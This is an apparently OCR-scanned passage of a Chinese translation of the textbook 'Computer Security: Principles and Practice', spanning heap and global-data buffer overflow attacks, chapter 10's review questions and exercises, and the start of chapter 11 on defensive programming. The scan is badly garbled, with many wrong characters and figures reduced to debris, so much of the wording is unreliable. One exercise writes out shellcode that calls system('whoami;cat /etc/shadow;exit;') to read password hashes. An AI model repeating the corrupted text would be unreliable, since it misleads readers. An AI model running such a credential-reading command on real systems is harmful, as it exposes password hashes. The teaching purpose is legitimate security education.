sled 填充 这 个 shellcode 达到 准确 的 64 个 字 节 ， 然 后 在 缓冲 区 里 追加 一 个 合适 的 目标 地 址 用 于 
改写 函数 指针 。 这 个 目标 地 址 是 0x080497b8 ( 字 节 是 反 序 的 ， 像 前 面 讨论 的 ， 因 为 x86 最 低 字 
节 在 最 前 ， 即 小 端 字 节 (little-endian))。 图 10-11b 中 显示 了 攻击 脚本 的 内 容 和 直接 运行 漏洞 程 
Fe (假设 是 setuid root) 的 结果 ， 拥 有 特权 的 shell 命令 得 以 成 功 执行 。 

即使 存在 漏洞 的 结构 体 在 堆 内 没有 直接 包含 肾 数 指针 ， 还 是 可 以 发 现 攻击 的 。 这 利用 了 这 
样 一 个 事实 : 在 堆 区 分 配 的 内 存 区 域 包 含 附 加 的 内 存 ， 这 超出 了 用 户 的 请 求 。 这 个 附加 的 内 存 
控制 着 内 存 分 配 和 重新 分 配 库 例 程 使 用 的 管理 数据 结构 体 。 这 些 结构 体 可 以 直接 或 者 非 直 接地 
允许 攻击 者 访问 因数 指针 并 最 终 被 调用 。 甚 至 可 以 使 用 几 个 缓冲 区 内 多 个 溢出 的 交互 (一 个 装 
载 shellcode ， 另 一 个 调节 目标 果 数 的 指针 并 引用 它 )。 

防御 堆 溢 出 的 方法 包括 使 堆 区 也 成 为 不 可 执行 的 。 这 会 阻止 写 到 堆 区 的 代码 的 执行 。 然 
而 ， 另 一 种 返回 导向 的 系统 调用 的 攻击 还 是 有 可 能 发 生 的 。 对 堆 区 内 存 分 配 采 取 随 机 选择 使 得 
对 目标 缓冲 区 地 址 的 预测 变 得 极其 困难 ， 从 而 阻碍 一 些 堆 溢 出 攻击 的 成 功 执行 。 男 外 ， 内 存 分 
Bc (allocator) 和 回收 费 〈deallocator) 包含 了 对 管理 数据 是 否 受 到 破坏 的 检查 ， 它 们 能 够 检 
测 和 终止 使 一 个 已 分 配 内 存 发 生 溢出 的 任何 企图 。 


10.34 全 局 数据 区 溢出 


我 们 讨论 的 最 后 一 类 缓冲 区 溢出 涉及 在 程序 的 全 局 (静态 ) 数据 区 中 设置 的 缓冲 区 。 
图 10-4 中 显示 ， 全 局 数据 从 程序 文件 中 被 装载 ， 并 设置 在 程序 代码 区 之 上 。 如 果 又 是 使 用 不 
安全 的 缓冲 区 操作 ， 数 据 可 以 溢出 到 一 个 全 局 数据 的 缓冲 区 ， 并 改变 相 邻 的 内 存 地 址 ， 包 括 可 
能 是 随后 就 要 调用 的 水 数 的 一 个 函数 指针 。 

图 10-12a 举例 说 明了 这 样 一 个 漏洞 程序 (与 图 10-11a 有 很 多 相似 之 处 ， 除 了 声明 结构 体 
为 一 个 全 局 变量 以 外 )。 在 这 个 攻击 的 设计 中 ， 事 实 上 只 有 目标 地 址 发 生 了 改变 。 我 们 发 现 定 
义 的 全 局 结构 体 变量 的 地 址 是 0x08049740， 它 被 当 作 攻击 的 目标 地 址 。 我 们 还 注意 到 ， 全 局 
变量 通常 不 改变 存储 位 置 ， 因 为 它们 的 地 址 在 程序 代码 中 被 直接 使 用 。 攻 击 脚 本 和 成 功 执 行 的 
结果 显示 在 图 10-12b 中 。 

这 种 攻击 更 复杂 的 变种 利用 了 这 样 一 个 事实 : 进程 的 地 址 空间 可 以 在 全 局 数据 区 
相 邻 的 区 域 里 包含 一 些 其 他 的 管理 表 ( management table)。 这 种 表 能 够 包含 对 析 构 图 数 
(destructor) (GCC C 和 C++ 的 扩展 )、 全 局 偏 移 量 (global-offset) K (一 旦 库 被 装载 ， 用 于 
解决 对 动态 库 的 函数 引用 ) 以 及 其 他 结构 的 引用 。 攻 击 的 目标 又 是 改写 一 些 函 数 指针 ， 攻 击 
者 相信 这 是 接 下 来 被 攻击 的 程序 将 要 调用 的 函数 ,通过 改写 指针 将 控制 权 转 移 到 攻击 者 选 
择 的 shellcode。 

这 些 攻击 的 防御 方法 包括 使 全 局 数据 区 成 为 不 可 执行 的 ， 将 函数 指针 设置 在 其 他 类 型 数据 
之 下 ， 以 及 在 全 局 数据 区 和 任何 其 他 的 管理 区 之 间 使 用 guard 页 。 


10.3.5 ”其 他 类 型 的 溢出 


除了 我 们 已 经 讨论 的 缓冲 区 洲 出 之 外 ， 还 有 包括 格式 化 字符 串 洲 出 和 整数 溢出 等 在 内 
的 很 多 类 型 的 溢出 。 未 来 甚至 还 将 发 现 更 多 其 他 类 型 。 本 章 推荐 的 阅读 材料 中 给 出 的 参考 包 
括 另 外 一 些 变种 的 细节 内 容 。 特 别 地 ， 一 系列 缓冲 区 溢出 攻击 的 细节 可 以 查阅 [LHEE03] 和 
[VEEN12]. 
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重要 的 是 ， 如 果 程 序 首 先 没 有 正确 编码 保护 数据 结构 ， 针 对 它们 的 攻击 就 可 能 发 生 。 尽 


~ 


管 很 多 防御 方法 能 够 阻止 这 样 的 攻击 ， 但 一 些 如 图 10-1 (破坏 了 一 个 相 邻 的 变量 值 ， 这 在 
某 种 意义 上 改变 了 攻击 程序 的 行为 ) 所 示 的 示例 ， 不 能 简单 地 被 阻止 ， 而 要 通过 编码 阻止 


它们 。 





a) 存在 漏洞 的 全 局 数据 溢出 C 语言 代码 


= 
~ 







ET ee ee 


b) 全 局 数据 溢出 攻击 示例 
图 10-12 全 局 数据 洲 出 攻击 的 示例 


10.4 关键 术语 、 复 习题 和 习题 


关键 术语 

address space (地 址 空间 ) guard page (guard 页 ) 
buffer (缓冲 区 ) heap (H) 

buffer overflow ( 绥 冲 区 溢出 ) heap overflow ( 推 溢出 ) 


buffer overrun (缓冲 区 溢出 ) library function (JÆ KXL) 


#10 HRB 253 


memory management (内 存 管 理 ) stack frame ( 栈 帧 ) 

nonexecutable memory (不 可 执行 的 内 存 ) stack buffer overflow ( 栈 缓冲 区 溢出 ) 
no-execute (不 可 执行 ) stack smashing ( 栈 溢出 ) 

off-by-one ( 差 一 错误 ) vulnerability (漏洞 ) 


position independent (浮动 地 址 ) 


复习 题 


10.1 
10.2 
10.3 
10.4 
10.5 
10.6 
10.7 
10.8 
10.9 
10.10 
10.11 
10.12 
10.13 
10.14 
10.15 
10.16 


习题 
10.1 
10.2 
10.3 


10.4 
10.5 


10.6 


10.7 


10.8 


10.9 


给 出 缓冲 区 溢出 的 定义 。 
在 进程 的 地 址 空间 容易 发 生 缓冲 区 溢出 攻击 ， 请 列 出 作为 攻击 目标 的 三 种 不 同类 型 的 存储 单元 。 
缓冲 区 溢出 发 生 的 可 能 后 果 是 什么 ? 
为 了 实现 缓冲 区 溢出 ， 必 须 确定 的 两 个 关键 元 素 是 什么 ? 
哪 种 类 型 的 程序 设计 语言 容易 出 现 缓冲 区 溢出 漏洞 ? 
描述 一 个 栈 缓冲 区 溢出 攻击 是 如 何 实现 的 。 
给 出 shellcode 的 定义 。 
在 shellcode 中 经 常 发 现 哪些 约束 条 件 ? 如 何 避 免 ? 
描述 什么 是 NOP sled， 在 一 个 缓冲 区 溢出 攻击 中 如 何 使 用 它 ? 
攻击 者 设计 shellcode 可 以 实施 攻击 ， 请 列 出 一 些 不 同 的 操作 。 
缓冲 区 溢出 的 两 类 防御 措施 是 什么 ? 
列 出 并 简要 描述 一 些 在 编译 新 程序 时 ， 能 够 使 用 的 防御 缓冲 区 溢出 的 方法 。 
列 出 并 简要 描述 一 些 在 运行 已 有 的 存在 漏洞 的 程序 时 ， 能 够 实现 的 防御 缓冲 区 溢出 的 方法 。 
摘 述 一 个 返回 导向 的 系统 调用 攻击 是 如 何 实现 的 ， 以 及 为 什么 使 用 它 。 
摘 述 一 个 堆 缓冲 区 溢出 攻击 是 如 何 实现 的 。 
描述 一 个 全 局 数据 区 溢出 攻击 是 如 何 实现 的 。 


使 用 UNIX 的 手册 页 ( man page) 或 者 任何 C 语言 程序 设计 课本 ， 研 究 在 图 10-2 中 显示 的 每 一 个 
不 安全 的 标准 C 语言 库 函 数 ， 并 且 确 定 一 个 较 安 全 的 来 使 用 。 

重新 编写 图 10-1a 中 显示 的 程序 ， 使 其 不 再 有 缓冲 区 溢出 的 漏洞 。 

重新 编写 图 10-5a 中 显示 的 函数 ， 使 其 不 再 有 栈 缓冲 区 溢出 的 漏洞 。 

重新 编写 图 10-7a 中 显示 的 函数 ， 使 其 不 再 有 栈 缓冲 区 溢出 的 漏洞 。 

在 图 10-8b 中 显示 的 shellcode 中 ,假设 系统 调用 execve 不 返回 (只 要 成 功 执行 shellcode 就 
是 这 种 情形 )。 然 而 ,为 了 掩盖 它 调用 shellcode 失败 的 情形 ， 在 调用 之 后 扩充 代码 包含 另 一 
个 系统 调用 ， 就 是 exit(0)。 这 个 函数 的 执行 使 程序 能 够 正常 退出 ， 比 程序 异常 终止 可 以 减少 
一 些 程序 员 的 注意 力 。 增 加 一 些 额外 的 汇编 指令 来 配置 参数 和 调用 这 个 系统 图 数 ， 从 而 扩展 
这 段 shellcode。 

使 用 图 10-8b 中 显示 的 原始 shellcode 或 者 习题 1.5 中 被 修改 的 代码 ， 尝 试 运行 栈 溢出 攻击 。 你 需要 
使 用 一 个 在 默认 设置 下 不 包括 栈 保护 机 制 的 旧版 本 操作 系统 。 然 后 确定 缓冲 区 和 栈 帧 的 存储 位 置 ， 
确定 攻击 字符 串 ， 以 及 编写 一 个 简单 的 程序 ， 对 这 些 内 容 编码 ， 以 此 实现 攻击 。 

在 PowerPC 处 理 器 (例如 ， 通 过 使 用 MacOS 或 者 PPC Linux distributions) 上 确定 一 些 汇编 语言 指 
令 ， 实 现在 图 10-8a 中 显示 的 shellcode 的 功能 。 

研究 代替 标准 C 语言 字符 串 库 的 库 的 使 用 情况 ， 例 如 ，Libsafe bstring, vstr 或 者 其 他 的 。 确 定 必 
要 的 代码 的 变化 情况 ， 如 果 有 变化 ， 使 用 选择 的 库 。 

确定 实现 返回 导向 的 系统 调用 攻击 的 shellcode， 它 调用 函数 system (“whoami;cat /etc/shadow;exit;” ), 
目标 是 习题 10.6 使 用 的 存在 漏洞 的 程序 。 你 需要 利用 调试 器 跟踪 一 个 合适 的 检测 程序 ， 识 别 在 目 
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10.10 


10.11 


10.12 


10.13 


10.14 


标 系统 上 标准 库 函 数 system) 的 存储 位 置 。 接 下 来 需要 确定 在 攻击 字符 串 中 使 用 的 地 址 和 数据 值 
的 正确 序列 ， 尝 试 运行 这 次 攻击 。 

重新 编写 图 10-10 中 显示 的 函数 ， 使 其 不 再 受到 缓冲 区 溢出 的 攻击 。 

重新 编写 图 10-11a 中 显示 的 程序 ， 使 其 不 再 有 堆 绥 冲 区 溢出 的 漏洞 。 

审查 一 些 来 自 CERT、SANS 或 者 类 似 组 织 公 布 的 最 新 漏洞 ， 找 出 其 中 发 生 缓 冲 区 溢出 攻击 的 漏 
洞 ， 并 对 每 一 个 使 用 的 缓冲 区 类 型 进行 分 类 ， 确 定 它 是 否 是 我 们 在 本 章 讨 论 的 某 一 种 类 型 的 攻 
击 ， 还 是 另 一 个 变种 。 

研究 格式 化 字符 串 溢出 攻击 的 细节 ， 它 是 如 何 工作 的 ， 它 使 用 的 攻击 字符 串 是 如 何 设计 的 ? 接 下 
来 对 一 个 合适 的 易 受 攻击 的 测试 程序 尝试 实现 这 种 攻击 。 

研究 整数 洲 出 攻击 的 细节 ， 它 是 如 何 工作 的 ， 它 使 用 的 攻击 字符 串 是 如 何 设计 的 ? 接 下 来 对 一 个 
合适 的 易 受 攻击 的 测试 程序 尝试 实现 这 种 攻击 。 


| 第 11 章 


Computer Security: Principles and Practice, 4th Edition 


软件 安全 





学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

o 描述 有 多 少 计 算 机 安全 漏洞 是 由 不 良 的 编程 习惯 导致 的 ; 

o 描述 一 个 程序 的 抽象 视图 ， 并 详细 说 明 该 视图 中 可 能 存在 脆弱 点 的 位 置 ，; 
® 


描述 一 个 防御 性 的 程序 设计 方法 是 如 何 对 其 所 做 的 每 个 假设 进行 验证 ， 并 令 任何 错误 所 
导致 的 执行 失败 变 得 安全 而 优雅 的 ; 

详细 说 明 由 于 错误 处 理 程序 输入 、 没 有 检查 输入 的 长 度 或 解释 而 导致 的 很 多 问题 ; 
描述 在 实现 一 些 算 法 时 发 生 的 问题 ; 

描述 由 于 程序 和 操作 系统 组 件 的 交互 导致 的 问题 ; 

描述 由 于 程序 输出 而 发 生 的 问题 。 


第 10 章 我 们 讨论 了 缓冲 区 溢出 的 问题 。 以 后 ， 缓 冲 区 溢出 还 将 是 一 个 最 常见 的 、 也 是 最 
容易 受到 攻击 的 软件 漏洞 。 尽 管 在 上 一 章 我 们 给 出 了 许多 应 对 策略 ， 但 是 针对 这 种 威胁 最 好 的 
防御 方法 就 是 不 允许 发 生 缓冲 区 溢出 。 也 就 是 说 ， 我 们 需要 安全 地 编写 程序 ， 从 而 阻止 这 样 的 
漏洞 出 现 。 

一 般 地 说 ， 缓 冲 区 溢出 只 是 在 不 严谨 的 程序 中 发 现 的 一 系列 缺陷 的 一 种 。 有 许多 的 漏洞 与 
程序 的 缺陷 有 关 ， 这 些 漏洞 导致 了 安全 机 制 的 破坏 ,并 且 允 许 对 计算 机 数据 和 资源 未 经 授权 的 
访问 和 使 用 。 

本 章 探讨 软件 安全 的 一 般 性 问题 。 我 们 介绍 一 个 计算 机 程序 的 简单 模型 ， 它 能 帮助 我 们 识 
别 在 什么 地 方 可 能 发 生 安全 问题 。 接 下 来 探讨 一 个 关键 问题 ， 那 就 是 如 何 正 确 处 理 程序 的 输入 
来 阻止 多 种 类 型 漏洞 的 产生 ; 更 一 般 来 讲 ， 就 是 如 何 编 写 安全 的 程序 代码 ， 以 及 如 何 管理 其 与 
操作 系统 和 其 他 程序 的 交互 。 


11.1 软件 安全 问题 





软件 安全 和 防御 性 程序 设计 


很 多 计算 机 安全 漏洞 都 是 由 于 不 严谨 的 编程 习惯 造成 的 。VERA16 报告 (the Veracode 
State of Software Security Report) 中 就 提 到 这 种 由 不 良 编程 习惯 造成 的 计算 机 安全 漏洞 比 大 多 
数 人 认为 的 还 要 普遍 。 表 11-1 中 总 结 了 CWE/SANS 评 出 的 前 25 个 最 严重 的 软件 错误 (The 
CWE/SANS Top 25 Most Dangerous Software Errors)， 他 们 一 致 认为 不 良 的 编程 习惯 是 导致 大 多 
数 网 络 攻击 的 原因 。 这 些 错 误 可 以 归纳 为 三 类 : 组 件 之 间 的 不 安全 的 交互 、 高 风险 的 资源 管 
理 、 脆 弱 的 防御 。 同 样 ， 开 放 Web 应 用 安全 项 目 (The Open Web Application Security Project) 
前 10 个 关键 的 Web 应 用 安全 性 漏洞 中 ， 有 5 个 与 不 安全 的 软件 程序 代码 相关 ， 其 中 包括 未 经 
验证 的 输入 、 路 站 点 脚本 、 缓 冲 区 溢出 、 注 和 攻击 (injection flaw) 和 不 恰当 的 错误 处 理 。 程 
序 中 的 错误 代码 以 及 没有 充分 进行 检查 和 验证 的 数据 造成 了 这 些 缺 陷 的 发 生 。 而 意识 到 这 些 
问题 是 程序 员 编写 安全 程序 代码 至 关 重 要 的 第 一 步 。CWE/SANS 以 及 开放 Web 应 用 安全 项 目 
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[OWAS13] 所 列 出 的 错误 和 漏洞 ， 都 强调 了 软件 产业 对 开发 人 员 关 于 这 些 备 受 关注 的 安全 问题 
的 解决 要 求 ， 并 对 如 何 解 决 这 些 问题 提供 了 指导 。NIST 报告 NISTIR 8151(〈 大 量 减 少 软件 漏洞 ， 
2016 Æ 10 H) 提出 了 一 系列 以 大 量 减少 软件 漏洞 数量 为 目的 的 方法 。NIST 报告 提出 了 以 下 
建议 : 

e 通过 使 用 改进 的 方法 来 指定 和 构建 软件 ， 以 预防 漏洞 的 出 现 。 

e 通过 使 用 更 好 且 更 加 有 效 的 测试 技术 在 漏洞 被 利用 之 间 发 现 他 们 。 

e 通过 建立 弹性 更 强 的 架构 来 减少 漏洞 带 来 的 影响 。 


表 11-1 CWE/SANS 评 出 的 前 25 个 最 严重 的 软件 错误 ( 2011 ) 


软件 错误 类 型 : 组 件 之 间 的 不 安全 的 组 件 间 交互 

对 SQL 命令 中 使 用 的 特定 元 素 处 理 不 当 (SQL 注入 ) 

对 操作 系统 命令 中 使 用 的 特定 元 素 处 理 不 当 (操作 系统 命令 注入 ) 
对 Web 页 生成 期 间 输 入 的 处 理 不 当 〈 跨 站 点 脚本 ) 

对 危险 类 型 的 文件 不 受 限制 的 上 载 

跨 站 点 伪造 请 求 (CSRF ) 

重 定向 到 不 受信 任 站 点 的 URL (开放 重 定向 ) 


软件 错误 类 型 : 高 风险 的 资源 管理 

未 检查 输入 长 度 就 进行 缓冲 区 复制 (经 典 的 缓冲 区 溢出 ) 
对 指向 受 限 目 录 的 路 径 名 限定 不 当 (路 径 穿 透 ) 

不 做 完整 性 检查 就 进行 代码 下 载 

包含 来 自 于 不 可 信和 控制 域 的 功能 

使 用 可 能 具有 危害 性 的 功能 

对 缓冲 区 大 小 计算 错误 

对 输入 的 字符 串 格 式 不 加 控制 

整 型 溢出 或 环绕 


软件 错误 类 型 : 脆弱 的 防御 

对 关键 功能 的 授权 缺失 

授权 缺失 

使 用 硬 编码 的 证 书 
忽视 对 敏感 数据 的 加 密 

在 安全 决策 中 信赖 不 可 信 的 输入 

在 不 必要 的 特权 级 别 下 运行 
授权 不 当 

对 重要 资源 的 权限 分 配 不 当 

使 用 已 被 破解 的 或 者 有 风险 的 加 密 算 法 
对 过 度 的 认证 尝试 未 予以 适当 的 限制 
使 用 单 向 散 列 函数 时 没有 给 输入 加 盐 


软件 安全 与 软件 质量 和 可 靠 性 紧密 相关 ,但 又 略 有 不 同 。 软 件 质 量 和 可 靠 性 关心 的 是 一 
个 程序 是 否 意外 出 错 ， 这 些 错误 是 由 一 些 随机 的 未 预料 的 输入 、 系 统 交 互 或 者 使 用 错误 代码 引 
起 的 ， 它 们 服从 一 些 形式 的 概率 分 布 。 提 高 软件 质量 通常 的 方法 ， 是 采用 某 些 形式 的 结构 化 
设计 ， 并 通过 测试 来 尽量 识别 和 消除 程序 中 的 bug， 一 般 包 括 可 能 的 输入 变化 和 常见 的 错误 测 
试 ， 目 的 是 在 平常 的 使 用 中 让 bug 的 数目 最 少 。 但 是 软件 安全 关心 的 不 是 程序 中 bug 的 总 数 ， 
而 是 这 些 bug 是 如 何 被 触发 导致 程序 失败 的 。 

软件 安全 不 同 于 软件 质量 和 可 靠 性 ， 攻 击 者 不 会 依据 一 定 的 概率 分 布 实施 攻击 ， 他 们 的 目 
标 是 那些 特殊 的 可 以 利用 的 bug， 从 而 造成 程序 失败 。 这 些 bug 经 常 能 够 通过 一 些 罕见 的 输入 
被 触发 ， 因 此 一 般 的 测试 方法 很 难 发 现 。 编 写 安全 的 程序 代码 需要 关注 一 个 程序 执行 的 各 个 方 
面 、 它 执行 的 环境 以 及 它 处 理 的 数据 类 型 。 没 什么 错误 能 够 被 假设 ， 所 有 潜在 的 错误 都 必须 被 
检查 。 这 些 问题 在 以 下 的 定义 中 比较 突出 : 
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防御 性 程序 设计 或 安全 程序 设计 ( Defensive or Secure Programming) 是 一 个 软件 设计 与 实现 
流程 ， 目 的 是 使 生成 的 软件 即使 在 面临 攻击 时 仍然 能 够 继续 工作 。 如 此 编写 而 成 的 软件 能 


够 检测 出 由 攻击 所 引发 的 错误 条 件 ， 并 能 继续 安全 地 执行 ; 或 者 即使 执行 失败 ， 也 能 优雅 
地 “落地 。 防 御 性 程序 设计 的 关键 是 绝 不 做 任何 假设 ， 但 是 要 检查 所 有 的 假设 ， 并 处 理 任 
何 可 能 的 错误 状态 。 





这 个 定义 强调 ， 需 要 对 一 个 程序 将 要 如 何 运行 以 及 它 将 如 何 处 理 各 种 类 型 的 输入 做 出 明确 
的 假设 。 为 了 帮助 弄 清 这 个 问题 ， 我 们 讨论 在 图 11-1 9S 中 给 出 的 一 个 程序 的 抽象 模型 。 这 个 图 
说 明了 在 大 多 数 程 序 设计 入 门 性 课程 中 讲授 的 概念 。 一 个 程序 从 各 种 可 能 的 数据 源 读 取 输 入 的 
数据 ， 并 且 依 据 茶 些 算法 处 理 这 些 数 据 ， 接 着 产生 输出 ， 可 能 是 输出 到 多 个 不 同 的 目的 地 。 程 
序 使 用 一 些 特 殊 处 理 需 类 型 的 机 器 指令 ， 在 某 些 操作 系统 提供 的 环境 下 执行 。 当 处 理 这 些 数据 
的 时 候 ， 程 序 使 用 系统 调用 ， 也 可 能 使 用 系统 上 可 用 的 其 他 应 用 程序 。 这 些 操作 能 够 造成 系统 
上 的 数据 被 保存 或 修改 ， 或 者 引起 对 程序 执行 结果 的 负面 影响 。 所 有 这 些 方 面 能 够 彼此 相互 作 
用 ， 且 相互 作用 的 方式 经 党 是 比较 复杂 的 。 


计算 机 系统 


执行 算法 处 理 输入 
数据 产生 输出 










Ein 


图 形 用 户 接口 
(GUI) 显示 





图 11-1 一 个 程序 的 抽象 模型 


在 编写 一 个 程序 时 ， 程 序 员 通 常 关 注 的 是 解决 程序 涉及 的 各 种 各 样 的 问题 ， 因 此 他 们 的 
注意 力 集中 在 成 功 完成 一 个 程序 所 需要 的 步骤 和 执行 一 个 程序 的 正常 流程 ， 而 不 是 考虑 造成 
程序 失败 的 每 一 个 可 能 的 地 方 。 他 们 经 常 对 一 个 程序 将 要 接收 的 输入 类 型 和 程序 执行 的 环境 
做 出 各 种 各 样 的 假设 。 防 御 性 程序 设计 意味 着 程序 需要 验证 所 有 这 些 假设 ， 所 有 可 能 的 失败 都 
能 安全 且 完 美 地 得 到 解决 。 正 确 预 测 、 检 查 和 处 理 所 有 可 能 的 错误 ， 当 然 会 提高 代码 开发 的 成 
本 ， 增 加 程序 编写 的 时 间 ， 这 正好 与 控制 程序 开发 的 时 间 尽 可 能 短 以 保证 市 场 效益 最 大 化 的 商 
业 压 力 冲 突 。 除 非 从 程序 开发 开始 时 就 把 软件 安全 作为 设计 目标 ， 和 否则 程序 安全 很 难保 证 。 

而 且 ， 当 程序 需要 更 改 时 ， 程 序 员 经 常 关注 的 是 哪些 需要 改变 以 及 需要 达到 什么 样 的 需 
求 。 此 外 ， 防 御 性 程序 设计 又 意味 着 程序 员 必 须 仔 细 检 查 他 所 做 的 每 一 个 假设 ， 检 查 和 处 理 所 
有 可 能 的 错误 ， 仔 细 检 查 与 存在 的 代码 之 间 的 每 一 个 交互 。 不 能 识别 和 处 理 这 些 交 互 可 能 会 导 
致 错误 的 程序 行为 ， 并 有 可 能 将 一 个 原来 安全 的 程序 变 成 一 个 存在 漏洞 的 程序 。 

传统 的 程序 设计 强调 的 是 程序 可 以 解决 大 多 数 用 户 在 大 部 分 时 间 和 希望 解决 的 问题 ， 然 而 防 
御 性 程序 设计 需要 程序 员 有 一 个 不 同 的 心态 。 转 变心 态 就 意味 着 程序 员 需 要 了 解 失 败 的 后 果 ， 


9” 这 个 图 是 对 文献 [WHEE03] 中 图 1-1 的 扩展 和 详细 说 明 。 
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以 及 攻击 者 使 用 的 技术 。“ 偏 执 ” 是 一 种 美德 ， 因 为 大 量 增长 的 漏洞 报告 真实 地 反映 出 攻击 者 就 
是 在 不 断 地 想 尽 办 法 攻击 你 。 这 种 心态 让 人 不 得 不 感受 到 正常 的 测试 技术 不 能 发 现 更 多 可 能 存在 
的 漏洞 ， 但 是 这 些 漏 洞 可 能 通过 军 见 或 者 未 知 的 输入 触发 。 这 意味 着 程序 员 需 要 不 断 地 学 习 摸 索 ， 
从 前 面 已 经 发 现 的 错误 中 吸取 教训 ， 从 而 保证 在 新 的 程序 中 避免 再 犯 相同 的 错误 。 这 同样 意味 着 
程序 员 应 将 程序 设计 得 具有 足够 强 的 弹性 ， 以 使 其 能 够 面 对 和 解决 任何 错误 和 预料 不 到 的 问题 。 
防御 程序 的 程序 员 必 须 明 白 程 序 的 失败 是 如 何 发 生 的 ， 清 楚 减 少 失 败 发 生 的 机 会 需要 哪些 步骤 . 

从 一 个 项 目的 初始 阶段 就 把 安全 性 和 可 靠 性 作为 设计 目标 ， 这 种 需求 长 时 间 以 来 已 经 成 为 
大 多 数 工程 学 科 的 共识 。 一 般 来 说 ， 社 会 对 桥梁 倒塌 、 建 筑 物 倒塌 和 飞机 失事 采取 了 不 宽容 的 
态度 ， 这 些 项 目 在 设计 时 被 要 求 必 须 尽 最 大 可 能 避免 这 类 悲剧 的 发 生 。 软 件 开发 没有 这 么 严重 ， 
人 们 对 于 软件 开发 的 失败 远 比 其 他 工程 学 科 要 宽容 得 多 。 尽 管 软 件 工 程 师 们 已 经 十 分 尽力 ， 并 
且 业 界 也 已 经 开发 了 一 系列 软件 开发 和 质量 标准 如 [SEI06] 或 ISO 12207 (信息 技术 : 软件 生命 
周期 过 程 ，1997 年 )， 但 现状 就 是 如 此 。 尽 管 上 述 标准 的 重点 在 于 软件 开发 的 生存 周期 ， 它 们 已 
开始 逐步 地 将 安全 视 为 一 个 关键 的 设计 目标 。 近 年 来 ， 人 们 用 在 改进 安全 软件 开发 流程 上 的 努 
力 越 来 越 多 。 由 众多 主要 的 IT 公司 加 盟 的 “ 迈 向 章 越 代码 的 软件 保障 论坛 ”( SAFECode), 在 
其 出 版 物 中 概括 了 业界 最 好 的 软件 保障 实践 ， 并 就 已 经 过 证 明 的 安全 软件 开发 的 实现 给 出 了 建 
议 ，[SIMP11] 就 是 这 些 出 版 物 中 的 一 个 。 本 章 我 们 将 讨论 他 们 推荐 的 软件 安全 开发 方法 。 

然而 ， 软 件 开 发 的 技术 和 标准 及 其 与 软件 安全 的 集成 ， 这 些 主题 已 经 远 远 超出 了 我 们 这 本 
书 的 讨论 范围 ，[MCGR06] 和 [VIEG01] 提供 了 关于 这 些 主题 更 多 的 细节 内 容 。[SIMP11] 推荐 
将 威胁 建 模 (也 称 作 风险 分 析 ) 并 人 设计 过 程 当 中 。 我 们 将 在 第 14 章 讨论 这 些 问题 。 这 里 我 
们 讨论 一 些 特殊 的 软件 安全 问题 ， 这 些 问题 应 该 并 人 一 种 范围 更 大 的 开发 方法 中 。 下 面 我 们 考 
察 与 正在 执行 的 程序 进行 各 种 交互 的 软件 安全 问题 ， 就 像 在 图 11-1 中 显示 的 那样 。 首 先 从 处 
理 安全 输入 的 关键 问题 入 手 ， 接 着 讨论 和 算法 实现 、 与 其 他 组 件 的 交互 以 及 程序 的 输出 等 相关 
的 安全 问题 。 在 分 析 这 些 潜在 的 安全 问题 时 ， 我 们 不 得 不 承认 很 多 安全 汤 洞 是 由 一 小 部 分 常见 
错误 导致 的 ， 我 们 就 讨论 这 些 问题 。 

本 章 中 的 例子 主要 集中 在 Web 应 用 的 安全 问题 。 在 这 些 应 用 程序 快速 开发 过 程 中 ， 经 常 
由 于 开发 者 没有 足够 的 软件 安全 意识 ， 以 及 通过 Internet 陷 人 攻击 者 制造 的 一 个 大 陷阱 ， 造 成 
这 些 应 用 非常 容易 受到 攻击 。 然 而 ， 我 们 强调 这 里 所 讨论 的 原理 可 以 应 用 于 所 有 的 程序 。 我 们 
需要 一 直 遵 循 安全 的 程序 设计 理念 ， 甚 至 是 那些 看 起 来 无 害 的 程序 ， 因 为 要 预测 程序 未 来 的 应 
用 是 非常 困难 的 。 有 时 一 个 简单 的 为 本 地 应 用 设计 的 工具 ， 可 能 后 来 会 被 并 入 一 个 较 大 的 应 
用 ， 如 Web 上 能 够 使 用 的 应 用 ， 由 此 可 能 造成 重大 的 安全 隐患 。 


11.2 ”处 理 程序 输入 


对 程序 输入 不 正确 的 处 理 是 软件 安全 最 常见 的 失误 之 一 。 程 序 输入 是 指 程序 之 外 的 任意 数 
据 源 ， 程 序 员 在 编写 代码 的 时 候 并 不 清楚 地 知道 这 些 数据 的 值 。 程 序 输入 显然 包括 了 从 用 户 键 
盘 、 鼠 标 、 文 件 或 者 网 络 连 接 读 入 到 程序 中 的 数据 。 然 而 ， 它 也 包含 了 在 执行 环境 中 提供 给 程 
序 的 数据 、 程 序 从 文件 读 入 的 任意 配置 值 或 者 其 他 的 数据 ， 以 及 操作 系统 提供 给 程序 的 值 。 所 
有 用 于 输入 的 数据 源 ， 以 及 对 它们 的 类 型 和 存储 长 度 做 出 的 任何 假设 都 要 进行 识别 。 程 序 代码 
必须 明确 验证 这 些 假设 ， 所 有 的 值 必须 与 这 些 假设 保持 一 致 。 任 何 程序 输入 都 有 两 个 关键 点 需 
要 我 们 考虑 ， 也 就 是 输入 的 长 度 及 输入 的 含义 和 解释 。 


11.2.1 输入 的 长 度 和 缓冲 区 溢出 
当 程 序 员 从 一 些 数 据 源 读 取 或 者 复制 输入 数据 的 时 候 ， 他 们 经 常 对 这 些 输 入 数据 的 最 大 长 
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度 做 出 假设 。 如 果 输 入 数据 是 用 户 键入 的 文本 ， 无 论 是 作为 程序 的 一 个 命令 行 参数 ， 还 是 作为 
响应 提示 符 的 输入 ， 这 时 假设 的 输入 长 度 经 常 不 超过 几 行 。 所 以 ， 程 序 员 设置 一 个 典型 的 512 
字 节 或 者 1024 字 节 的 缓冲 区 用 来 存储 这 些 输入 ， 但 通常 并 不 检查 确认 实际 输入 的 内 容 是 否 多 于 
假设 的 长 度 。 如 果 输 入 数据 超出 缓冲 区 的 范围 ， 那 么 就 会 发 生 一 个 缓冲 区 溢出 ， 它 可 能 危害 程 
序 的 执行 。 在 第 10 章 我 们 详细 地 讨论 了 缓冲 区 溢出 的 问题 。 由 于 提供 的 输入 测试 数据 通常 仅 能 
反映 程序 员 希 望 用 户 提 供 的 输入 范围 ， 因 此 程序 的 测试 不 能 很 好 地 识别 缓冲 区 溢出 的 漏洞 。 这 
些 测 试 输 入 不 大 可 能 包含 那些 诱发 缓冲 区 溢出 的 众多 的 输入 ， 除 非 这 个 漏洞 被 明确 地 测试 到 。 
许多 广泛 使 用 的 C 语 言 的 标准 库 例 程 GR 10-2 中 列 出 了 其 中 的 一 些 )， 它 们 都 存在 着 一 个 
